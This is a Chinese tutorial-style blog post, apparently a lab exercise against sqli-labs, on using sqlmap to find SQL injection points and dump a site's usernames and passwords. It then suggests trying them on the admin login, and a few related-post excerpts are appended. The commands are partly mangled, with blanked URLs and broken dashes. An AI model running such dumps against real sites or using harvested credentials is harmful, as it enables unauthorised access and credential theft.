sqlmap獲取後台賬號密碼
一. sqlmap
sqlmap是乙個自動化注入工具,其主要功能是掃瞄、發現並利用給定的url的sql注入漏洞,內建了很多繞過外掛程式。支援的資料庫mysql、oracle、sql server等眾多資料庫。
二. 常見注入型別
ü 布林型別盲注,即可以根據返回頁面判斷條件真假的注入
ü 基於時間的盲注,即不能根據返回頁面的內容判斷任何資訊,要用條件語句檢視時間的延遲語句是否已執行(頁面返回時間的增加)來判斷
ü 基於報錯注入,即頁面會返回錯誤資訊,或者把注入的語句的結果直接返回到頁面中
ü 聯合查詢注入,在可以使用union的情況下的注入
ü 堆查詢注入,可以使用多條執行語句時的注入
三. 所用環境及工具
ü python 2.7.8
ü sqlmap 1.4
ü sqlilabs
四. 步驟
安裝sqlmap需要安裝python環境(不支援python3),實驗中使用到的環境是python 2.7.8。
把sqlmap安裝包放入python的安裝目錄下面,進入到sqlmap的目錄。
判斷目標url是否存在注入點。檢測出注入點,便進一步查詢資料庫。
查詢當前使用者下的所有資料庫名稱 sqlmap.py -u 「 --dbs
查詢當前使用的資料庫 sqlmap.py -u 「 --current-db 獲取當前資料庫的名稱
進而查詢當前資料中的表 sqlmap.py -u 「 -d security –tables
知道了表過後,就可以來查詢表中的字段了 sqlmap.py -u 「 -d security -t users –columns
查詢出了字段過後,就可以來查尋表中的資料了,也就是賬號密碼。得到帳戶密碼過後,可以尋找後台位址來嘗試登陸。
sqlmap.py -u 「 -d security -t users -c password,username –dump
五. sql注入的防禦
對客戶端提交的**進行嚴格的轉義和過濾。
Web安全入門 sqlmap
列舉一下sqlmap簡單命令和相對應的功能 檢測注入點 sqlmap.py u 目標url 檢測有哪些資料庫 sqlmap.py u 目標url dbs 檢測當前使用的哪個資料庫 sqlmap.py u 目標url current db 檢測當前使用者 sqlmap.py u 目標url curre...
Sqlmap獲取目標
d表示直連 banner 獲取banner資訊 之前只探測乙個url 現在探測多個url 對於第乙個我們在windows下進行 先設定windows下的瀏覽器 然後在kali中開啟burp進行一些設定 具體設定上面那張有 然後開始開啟 burp擷取到的資料報會自動存到乙個檔案中 然後sqlmap中輸...
資訊保安 安全工具 sqlmap
sqlmap是乙個自動化的sql注入工具,其主要功能是掃瞄,發現並利用給定的url的sql注入漏洞 1.安裝 2.實驗 在pikachu實驗平台數字型注入中抓包,記錄鏈結以及提交給伺服器的引數 讀取資料庫 在cmd中進入sqlmap的安裝目錄,輸入命令 python sqlmap.py u data...